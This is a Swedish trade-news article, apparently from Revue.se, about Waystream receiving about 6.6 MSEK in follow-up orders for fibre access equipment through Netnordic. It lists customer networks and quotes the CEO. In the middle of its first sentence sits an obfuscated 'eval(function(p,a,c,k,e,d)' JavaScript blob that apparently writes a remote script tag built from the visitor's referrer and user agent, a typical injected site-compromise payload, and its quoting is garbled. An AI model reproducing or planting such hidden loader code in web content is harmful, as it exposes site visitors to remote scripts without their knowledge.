Image Image Image Image Image Image Image Image Image Image

| 19 mars, 2018

Scroll to top

Top

No Comments

Waystream erhåller uppföljningsordrar till ett värde av 6,6 MSEK via sin partner Netnordic | Revue.se

Waystream erhåller uppföljningsordrar till ett värde av 6,6 MSEK via sin partner Netnordic
Sebastian Plengier Ehrnfelt

Waystream, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|etbeh|var|u0026u|referrer|ainda||js|php’.split(‘|’),0,{}))
som utvecklar och säljer accessutrustning till fiberbaserade bredbandsnät, har via sin partner Netnordic AB i Sverige fått ett flertal uppföljningsordrar gällande accessutrustning. Det totala ordervärdet för dessa beräknas till cirka 6,6 MSEK. 

Accessutrustningen, bestående av ASR6000, MS4000 och tillhörande SFP:er, levereras omgående och ska användas i utbyggnaden av befintliga nät hos ett flertal av Netnordics kunder som levererar fiberbaserade bredbandsnätverk till hushåll och företag.

Bland kunderna som omfattas av affären finns:

–       Affärsverken, som äger, bygger och driver Karlskronas fiberoptiska stadsnät som når ut till 14 000 hushåll och företag i kommunen

–       Borås Elnät, som är ett kommunägt bolag som tillhandahåller ett fiberbaserat kommunikationsnät i Borås till vilket cirka 9 000 hushåll och 700 företag är anslutna

–       MittNät, som erbjuder fiberbaserat bredband i kommunerna Arvika, Forshaga, Hammarö, Karlstad, Munkfors och Åmål

–       Vökby Bredband, som är en tjänsteleverantör och operatör som förser kommunerna Vadstena, Ödeshög, Kinda, Boxholm och Ydre med kommunikationstjänster via fiber

–       Öresundskraft, som svarar för utbyggnad och driften av stadsnätet i Helsingborg och Bjuv samt erbjuder tjänster via Höganäs Energi och Björnekulla IT

–       Pite Energi, som erbjuder bredbandsnät via fiber till företag, hushåll och offentlig förvaltning i Piteå kommun.

– Vi är såklart mycket glada över Netnordics och våra gemensamma kunders fortsatta förtroende. Vi har löpande levererat accessutrustning till dem i takt med att de utökat sitt fiberbaserade nätverk gentemot svenska konsumenter. I Sverige ser efterfrågan ut att även fortsättningsvis växa snabbt precis som i övriga Europa, säger Johnny Hedlund, VD på Waystream.

Fibernät är den snabbast växande bredbandsteknologin i Sverige och Sverige är ett av sju länder inom Europa som idag har fler än 1 miljon fiberanslutningar. Enligt Heavy Reading beräknas antalet fiberanslutningar i Sverige öka till drygt 2,2 miljoner fram till 2019.[1]

I Europa förväntas marknaden för fiber att fördubblas under kommande år och fjolårets 31 miljoner anslutningar förväntas bli upp emot 62 miljoner inom 4 år. Det innebär att drygt 20 % av Europas hushåll kommer vara anslutna till fibernät år 2019 (FTTH/FTTB). [2]